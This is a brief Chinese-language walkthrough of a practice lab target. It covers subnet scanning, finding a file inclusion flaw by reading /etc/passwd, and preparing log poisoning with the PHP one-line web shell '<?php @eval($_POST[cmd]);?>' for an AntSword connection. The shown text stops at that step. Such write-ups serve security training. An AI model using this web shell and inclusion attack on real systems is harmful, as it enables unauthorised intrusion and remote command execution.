1、首先确保靶机和kali都是net模式
2、用kali虚拟机扫描同一网段下的所有IP获取靶机的IP
扫到了,接下来我们去访问192.168.19.155
3、打开浏览器访问192.168.19.155
4、扫描这个IP
5、扫到了一条敏感目录,去访问看一下
6、在这些目录里查看一下
首先看到了一个很显眼的文件就是info.php,进去看一下
这两个信息告诉我们可以远程读取文件,但是不允许包含文件
查看一下源代码
查到源代码发现了include这个高危函数,这个函数存在的话就可能存在文件包含漏洞,我们去URL后面输入?image=/etc/passwd,看看会不会显示信息
页面显示信息了,说明确实存在文件包含漏洞
7、回来kali,扫一下网站开启的端口
在网站后面直接跟上木马,尝试写入
<?php @eval($_POST[cmd]);?>
8、这里看到有点问题,我们先抓包看一下
发现我们的尖括号和空格被编码了,我们给它改回去
9、然后放行,再去访问一下日志文件
注:/var/log/auth.log 记录了所有和用户认证相关的日志 。无论是我们通过 ssh 登录,还是通过 sudo 执行命令都会在 auth.log 中产生记录
访问到了日志文件,但是我们也看不懂,我们去尝试去蚁剑测试连接